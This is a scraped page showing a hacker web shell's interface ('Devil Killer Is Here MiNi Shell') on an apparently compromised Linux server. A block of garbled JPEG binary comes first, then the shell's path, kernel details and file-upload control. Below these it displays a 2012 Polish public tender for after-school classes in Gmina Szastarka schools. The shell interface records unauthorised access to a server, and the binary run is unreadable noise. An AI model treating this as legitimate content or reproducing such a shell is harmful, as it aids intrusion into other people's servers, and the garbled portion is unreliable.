JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120628/226148-N-2012.html

<p class="kh_header"><b>Szastarka: Dodatkowe zajęcia dla klas I-III ze szkół podstawowych Gminy Szastarka, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytetu IX Programu operacyjnego Kapitał Ludzki Rozwój wykształcenia i kompetencji    w regionach, Działanie 9.1, Poddziałanie 9.1.2Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</b><br>
<b>Numer ogłoszenia: 226148 - 2012; data zamieszczenia: 28.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szastarka , 23-225 Szastarka, woj. lubelskie, tel. 015 8714104, faks 015 8714130.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaszastarka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dodatkowe zajęcia dla klas I-III ze szkół podstawowych Gminy Szastarka, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytetu IX Programu operacyjnego Kapitał Ludzki Rozwój wykształcenia i kompetencji    w regionach, Działanie 9.1, Poddziałanie 9.1.2Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przeprowadzenie 520 godzin zajęć pozalekcyjnych, zgodnie z poniższym zestawieniem: 
1.Zajęcia  w Zespole Szkół w  Blinowie -
będą odbywać  się  w okresie realizacji projektu do czerwca 2013 r.
1) zajęcia dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji- w wymiarze 30 h w ciągu realizacji projektu.
W SP w Blinowie  przewiduje się utworzenie 3 grupy uczniów (ogólna liczba dzieci 20 w tym 8 dziewczynek i 12 chłopców, 2 grupy 7 osobowe, 1 grupa - 6 osobowa ).
W  ramach projektu odbędzie się po 30 godzin zajęć z każdą grupą, łącznie 90 h 

2) Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych przewiduje się utworzenie  3 grupy zajęciowe ( 20 osób w tym 8 dziewczynek i 12 chłopców, 2 grupy 7 osobowe, 1 grupa 6 osobowa).
Dla każdej z grup przewidziano 30 h.

3) W SP w Blinowie zostaną  zorganizowane zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy w ramach 60 h.
W okresie realizacji projektu zostaną zorganizowane dla 2 grup dzieci zajęcia po 30 h dla  każdej. Liczebność grupy (ogółem 8 - osób, w tym  4 dziewczynki, 4 chłopców, po 4 osoby w grupie).

Produktem projektu  będą 
- 90 h  zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym takżezagrożonych ryzykiem dyslekcji,
- 90 h zajęć matematycznych,
- 60 h zajęć  logopedycznych
Pomiar produktu wykonywany będzie raz w miesiącu  na podstawie dzienników zajęć.
2. Zajęcia w Szkole Podstawowej w Polichnie- 
zajęcia będą odbywać się w okresie realizacji projektu do czerwca 2013 r. 
1) zajęcia dla dzieci ze specyficznymi  trudnościami  w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dyslekcji- w wymiarze 30 h, w ciągu  trwania projektu.
W SP  w Polichnie przewiduje się utworzenie 3 grupy uczniów( 20 osób w tym 8 dziewczynek   i 12 chłopców, 2 grupy 7 osobowe, 1 grupa 6 osobowa).
W ramach projektu odbędzie się po 30 godzin  zajęć z każdą grupą.

2) W SP w Polichnie zorganizowane zostaną zajęcia dla dzieci  z trudnościami  w zdobywaniu umiejętności matematycznych - projektodawca przewiduje utworzenie  3 grup. 
(Liczba dzieci ogółem 20 , w tym 8 dziewczynek i 12 chłopców, 2 grupy 7 osobowe, 1 grupa 6 osobowa). Dla każdej z grup przewidziano po 30 h zajęć. 
Zajęcia  będą odbywać się  bezpośrednio po lekcjach.
Produktem projektu ( pomiar produktu wykonywany będzie  raz w miesiącu na podstawie dzienników zajęć)
- 90 h zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w  tym także zagrożonych ryzykiem dyslekcji,
- 90 h zajęć matematycznych,
3. Zajęcia w Zespole Szkół w Szastarce-
zajęcia  będą odbywać się w okresie realizacji projektu, w okresie do czerwca 2013 r.

1) zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także  zagrożonych
    ryzykiem  dyslekcji w wymiarze 30 h , w ciągu  trwania projektu.
    Przewiduje się  utworzenie  grupy 8 osobowej ( 1 dziewczynka i 7 chłopców),

2) zajęcia dla  dzieci z trudnościami w zdobywaniu umiejętności  matematycznych  (30 h).
Przewidziano utworzenie 1 grupy zajęciowej ( 8 osób, w tym 3 dziewczynki i 5 chłopców).
3) zajęcia dla uczniów uzdolnionych  w zakresie nauk matematyczno-przyrodniczych. 
    Zajęcia  będą odbywały się w 1 grupie, w ramach 40 h, w ciągu realizacji projektu.
    Grupa docelowa to 6 osób.

Produktem projektu będą (pomiar produktu wykonywany będzie raz w  miesiącu na podstawie dzienników zajęć) 
- 30 h zajęć dla dzieci ze specyficznymi trudnościami w czytaniu  i pisaniu, w tym takżezagrożonych  ryzykiem dyslekcji,
- 30 h zajęć matematycznych,
- 40 h zajęć matematyczno-przyrodniczych.
W chwili przystąpienia do realizacji projektu  należy oznakować sale  i dokumenty zgodnie z zasadami  promocji  projektów PO KL . Do obowiązków osoby prowadzącej zajęcia z ramienia wykonawcy będzie należało m. in 
1. Świadczenie usług edukacyjnych według zestawienia zawartego w pkt.6.1.
2. Realizacja przedmiotu zamówienia, zgodnie z założeniami projektu systemowego pn. Dodatkowe zajęcia dla klas I-III ze szkół podstawowych Gminy Szastarka współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytetu IX Programu operacyjnego Kapitał Ludzki: Rozwój wykształcenia  i kompetencji w regionach, Działanie 9.1, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup  o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 
3. Zachowanie przy realizacji przedmiotu zamówienia należytej staranności i dbałości o interesy Zamawiającego. 
4. Opracowanie, najpóźniej w terminie 7 dni przed rozpoczęciem danego semestru, wstępnego programu i planu pracy zajęć pozalekcyjnych, obejmującego harmonogram oraz zakres zadania dla uczestników projektu pn. Dodatkowe zajęcia dla klas I-III ze szkół podstawowych Gminy Szastarka. przy następujących założeniach 
a) zajęcia powinny być dopasowane do tygodniowego planu zajęć w klasach I - III poszczególnych szkół podstawowych. 
b) zajęcia powinny być prowadzone przed lub po obowiązkowych lekcjach w godzinach dostosowanych do warunków szkoły. 
c) przerwa pomiędzy zakończeniem lub rozpoczęciem zajęć podstawowych a rozpoczęciem lub zakończeniem zajęć dodatkowych nie może przekroczyć 0,5 godziny zegarowej 
d) plan pracy zajęć pozalekcyjnych musi uwzględniać ograniczenia wynikające z planu lekcji szkoły  i poszczególnych klas
5. Przedstawienie powyższego do akceptacji dyrektorom Szkół Podstawowych Gminy Szastarka biorących udział   w projekcie   oraz zespołowi koordynującemu projekt 
6. Dostosowanie harmonogramu do aktualnego rozkładu zajęć (w przypadku zmiany planu lekcji). 
7. Informowanie Dyrektora danej szkoły, w której odbywać się będą zajęcia, o wszelkich zmianach w harmonogramie. Jednocześnie, każdorazowo, informację o zmianie w harmonogramie należy przedstawić drogą mailową również do Koordynatora i Asystenta projektu wyznaczonego przez Zamawiającego do realizacji projektu (adres mailowy zostanie przekazany po podpisaniu umowy z Wykonawcą) 
8. Prowadzenie zajęć pozalekcyjnych w grupach (zgodnie z projektem i harmonogramem zadań w projekcie), w terminie maksymalnym do  28.06.2013 r.według zaakceptowanego planu pracy 
9. Opracowanie tematyki zajęć oraz celów zajęć, zgodnie z celem ogólnym oraz celami szczegółowymi założonymi we wniosku aplikacyjnym, przy szczególnym uwzględnieniu potrzeb i umiejętności uczniów; scenariusze zajęć powinny uwzględniać szacunek i otwartość na inność wśród dzieci oraz zapewniać przestrzeganie zasady równości płci. 
10. Decydowanie o wyborze metod i środków dydaktycznych w prowadzeniu zajęć ze szczególnym stosowaniem aktywizujących metod nauczania z naciskiem na umiejętność wykorzystania wiedzy w praktyce. 
11. Rzetelna realizacja godzin zajęć w ramach projektu, zgodnie z ustalonym harmonogramem realizacji zajęć, zapewniająca realizację celu głównego projektu, którym jest objęcie wsparciem pedagogicznym rozwoju indywidualnego uczniów klas I-III z 3  szkół podstawowych Gminy Szastarka, z uwzględnieniem ich możliwości i potrzeb edukacyjnych oraz celów szczegółowych tj. 
a) Objęcie opieką logopedyczną uczniów, u których zdiagnozowano problemy z zaburzeniami rozwoju mowy,
b) Zminimalizowanie różnic w czytaniu i pisaniu oraz wsparcie dzieci ze szczególnymi trudnościami w zdobywaniu umiejętności matematycznych, poprzez dostosowanie wymagań dydaktyczno-wychowawczych do potrzeb  i możliwości ucznia 
c) Rozwijanie umiejętności i zainteresowań uczniów zdolnych w ramach nauk matematyczno przyrodniczych. 
12. Terminowe i prawidłowe sporządzanie dokumentacji dla każdego rodzaju zajęć , w tym m.in 
- założenie i prowadzenie Dzienników zajęć dla poszczególnych zajęć dodatkowych dla każdej ze szkół - uzupełnianych na bieżąco, 
- sporządzanie list obecności - Wykonawca jest odpowiedzialny za zgodność listy obecności podpisanej przez uczestników projektu z liczbą dzieci obecnych na zajęciach wykazaną w dzienniku zajęć, 
- sporządzanie sprawozdań i innych dokumentów zleconych przez zespół koordynujący projekt, w tym diagnozy przyrostu wiedzy uczniów i dokonywania ewaluacji prowadzonych zajęć w odniesieniu do założonych kryteriów    w projekcie- co kwartał, 
- sporządzanie ankiet przeprowadzonych wśród rodziców i nauczycieli poszczególnych przedmiotów przed i po okresie realizacji projektu; 
oraz przedstawienie i przekazanie we współpracy z Dyrektorem danej szkoły w szczególności 
a. dla zajęć logopedycznych : 
- opinii logopedy przed i po realizacji projektu, 
b. dla zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu oraz trudnościami  w zdobywaniu umiejętności matematycznych 
- zapisów w dziennikach lekcyjnych, 
- wyników semestralnych i rocznych, 
- opinii wychowawcy na temat postępów dziecka, 
c. dla zajęć rozwijających umiejętności i zainteresowania uczniów zdolnych w ramach nauk   matematyczno-przyrodniczych 
- testów osiągnięć, 
- wyników konkursów szkolnych, pozaszkolnych, 
- wyników semestralnych i rocznych, 
- analiz pracy uczniów - (test umiejętności dla uczniów), 
- ankiet przeprowadzonych wśród rodziców dot. rozwoju zainteresowań dziecka (przedrozpoczęciem  i po zakończeniu realizacji zajęć), 
- testu diagnozującego oraz testu sprawdzającego nabyte umiejętności z zajęć dodatkowych, 
13. Wydanie zaświadczeń o udziale w zajęciach wszystkim uczestnikom po zakończeniu realizacji zajęć. 
14. Wspomaganie promocji i ewaluacji projektu - informowania o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego, przestrzegania wytycznych dotyczących oznaczenia projektu w ramach POKL oraz współpraca z koordynatorem w mierzeniu postępów uczniów w zakresie rezultatów projektu., 
15. Oznakowanie miejsc oraz wszelkich dokumentów związanych z organizacją zajęć, zgodnie z Wytycznymi dotyczącymi oznakowania projektów w ramach POKL. 
16. Umożliwienie Zamawiającemu lub osobom upoważnionym przez Zamawiającego wizytowania podczas zajęć. 
17. Udział Wykonawcy lub osoby przez niego upoważnionej w comiesięcznych spotkaniach roboczych dot. monitorowania prawidłowej realizacji projektu, chyba, że Zamawiający zdecyduje inaczej. 
18. Prawidłowe i terminowe wykonywanie zadań. 
19. Troska o prawidłowy rozwój i bezpieczeństwo uczniów. 
20. Współpraca z zespołem koordynującym. 
21. Współdziałanie z Dyrektorami szkół, w których odbywają się zajęcia, w zakresie wszelkich spraw związanych z prowadzeniem zajęć. 
22. Współpraca z rodzicami uczniów. 
23. Dbanie o stan pomieszczeń, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu oraz ponoszenia odpowiedzialności materialnej za powierzone mienie. 
24. Przestrzeganie obowiązujących przepisów prawa oświatowego i statutów szkół oraz regulaminów pracowni, w których będą prowadzone zajęcia. 
25. Wykonywanie innych zadań wynikających z przepisów prawa, w tym w szczególności z dokumentów programowych POKL. III. Dodatkowe warunki zamówienia: 
1. Zakres obowiązków odnosi się do wszystkich powyżej wymienionych rodzajów zajęć. 
2. Jednostka tj. 1 godzina lekcyjna używana w SIWZ odpowiada czasowo 45 minutom, a dla zajęć specjalistycznych tj. zajęcia logopedyczne - 60 minutom.
3. W przypadku gdy zajęcia nie mogą się odbyć w zaplanowanym terminie, Wykonawca jest zobowiązany ustalić inny termin realizacji zajęć z zastrzeżeniem pkt 8 2). niniejszej SIWZ. 
4. W danej grupie tematycznej w danej szkole zajęcia powinien prowadzić jeden nauczyciel przez cały okres trwania umowy. 
5. W uzasadnionych przypadkach (np. długotrwała choroba), gdy nie ma możliwości przełożenia terminu realizacji zajęć, Wykonawca ma obowiązek wyznaczyć osobę zastępującą nauczyciela prowadzącego, posiadającą co najmniej równorzędne kwalifikacje, niezbędne do prowadzenia poszczególnych zajęć. 
6. Zajęcia będą przeprowadzane w Szkołach Podstawowych na terenie Gminy Szastarka biorących udział w realizacji niniejszego projektu. 
7. Zamawiający zaleca, aby prowadzenie zajęć w ramach projektu odbywało się w dniach od poniedziałku do piątku. 
8. Zajęcia mogą być prowadzone w oparciu o autorskie programy uwzględniające przeprowadzoną diagnozę potrzeb uczestników projektu - oznacza to, że Wykonawca może prowadzić zajęcia samodzielnie i w wybranej formie. 
9. Liczba godzin podanych w pkt. I.6. jest liczbą planowaną. Zamawiający zastrzega, że Wykonawca będzie otrzymywał wynagrodzenie wyłącznie za faktycznie zrealizowane i udokumentowane zajęcia pozalekcyjne. Wykonawcy nie będą przysługiwać żadne roszczenia prawne i finansowe w stosunku do Zamawiającego, jeśli  z powodów własnych lub obiektywnych przyczyn wynikających 
z organizacji szkoły, nie będzie mógł odbyć zajęć według harmonogramu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek posiadania wiedzy i doświadczenia będzie potwierdzony jeżeli wykonawca złoży  oświadczenie oraz wykaże posiadanie przez każdego nauczyciela biorącego udział  w realizacji zamówienia stopnia awansu zawodowego- minimum  nauczyciela kontraktowego)
tj.  winien posiadać  wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej oraz niezbędne kwalifikacje do prowadzenia zajęć stanowiących przedmiot niniejszego zamówienia (zgodnie z przepisami ustawy z dnia 26.01.1982r. Karta nauczyciela (Dz. U. z 2006r. Nr 97 poz. 674 ze zm.) oraz przepisami wykonawczymi do tej ustawy), w szczególności dla 
1. zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, trudnościami w zdobywaniu umiejętności matematycznych oraz zajęciami rozwijającymi zainteresowania matematyczno-przyrodnicze uczniów szczególnie uzdolnionych - ukończone studia wyższe z przygotowaniem pedagogicznym w zakresie edukacji wczesnoszkolnej lub ukończone studia wyższe  z przygotowaniem pedagogicznym oraz ukończone studia podyplomowe lub kurs kwalifikacyjny                          z zakresu edukacji wczesnoszkolnej, 
zajęć logopedycznych - ukończone studia wyższe z logopedii z przygotowaniem pedagogicznym lub ukończone studia wyższe z przygotowaniem pedagogicznym i ukończone studia podyplomowe z zakresu logopedii lub równoważne,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania   zamówienia - Zamawiający odstępuje od szczegółowego opisu tegoż warunku, gdyż  jest on opisany w pkt.a)  w warunku posiadania wiedzy i doświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dokument potwierdzający nadanie stopnia awansu zawodowego co najmniej nauczyciela kontraktowego,
- dokument potwierdzający ukończenie studiów wyższych z przygotowaniem pedagogicznym Dającym  kwalifikacje do nauczania w klasach I-III szkoły podstawowej,
- dokument potwierdzający ukończenie studiów wyższych w zakresie logopedii z przygotowaniem pedagogicznym lub wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe lub kurs kwalifikacyjny w zakresie logopedii,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek znajdowania się w sytuacji ekonomicznej i finansowej.
Z uwagi na to, iż zamawiający nie nakłada na wykonawcę żadnych wymogów dotyczących jego sytuacji  ekonomicznej i finansowej warunek ten będzie spełniony przez każdego z wykonawców.
Ocena spełniania w/w warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach
i oświadczeniach wyszczególnionych w SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły: SPEŁNIA - NIE SPEŁNIA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, z zastrzeżeniem ust.2. 
2. Dopuszcza się zmianę postanowień zawartej umowy, w stosunku do treści oferty, w następującym zakresie i przy spełnieniu następujących warunków
a) zmiany terminu płatności z przyczyn niezależnych od Zamawiającego, w tym w szczególności w wyniku zadziałania okoliczności siły wyższej, 
b) w zapisach umowy dotyczących wartości umowy w przypadku zmian w umowie  o dofinansowanie projektu, niemożliwych do przewidzenia na etapie opracowywania SIWZ, a które to będą wywoływały konieczność zmiany zapisów umowy. 
3. Zmiany danych dotyczących stron, innych osób wskazanych imiennie w umowie, nie będą traktowane jako zmiany Umowy i będą dokonywane w formie jednostronnego oświadczenia Strony, której zmiana dotyczy, złożonego na piśmie pod rygorem nieważności. 
4. Zmiany umowy, o których mowa w ust. 2, nie mogą powodować zwiększenia wartości umowy, o której mowa  w § 6 ust. 1 umowy. 
5. Z tytułu niniejszej umowy Wykonawca nie nabywa żadnych uprawnień pracowniczych przewidzianych przepisami Kodeksu Pracy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
